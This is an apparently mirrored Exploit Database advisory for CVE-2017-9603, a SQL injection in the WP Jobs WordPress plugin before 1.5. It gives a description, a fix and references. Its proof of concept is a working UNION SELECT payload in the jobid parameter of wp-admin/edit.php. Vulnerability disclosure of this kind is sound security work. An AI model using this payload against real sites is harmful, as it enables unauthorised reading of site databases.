WordPress Plugin WP Jobs < 1.5 - SQL Injection

• Exploit Database
• 13 阅读

• 作者： Dimitrios Tsagkarakis
  日期： 2017-06-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42172/

• # Exploit Title: WordPress Plugin WP Jobs < 1.5 - SQL Injection
  # Date: 11-06-2017
  # Exploit Author: Dimitrios Tsagkarakis
  # Website: dtsa.eu 
  # Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/
  # Vendor Homepage: http://www.intensewp.com/
  # Version: 1.4
  # CVE : CVE-2017-9603
  # Category: webapps
  
   
  
  1. Description:
  
   
  
  SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress
  allows authenticated users to execute arbitrary SQL commands via the jobid
  parameter to wp-admin/edit.php. 
  
   
  
  2. Proof of Concept:
  
   
  
  http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&j
  obid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment
  
   
  
  3. Solution:
  
   
  
  A new version of WP Jobs is available. Update the WordPress WP Jobs to the
  latest version.
  
   
  
  4. Reference:
  
   
  
  http://dtsa.eu/cve-2017-9603-wordpress-wp-jobs-v-1-4-sql-injection-sqli/
  
  http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9603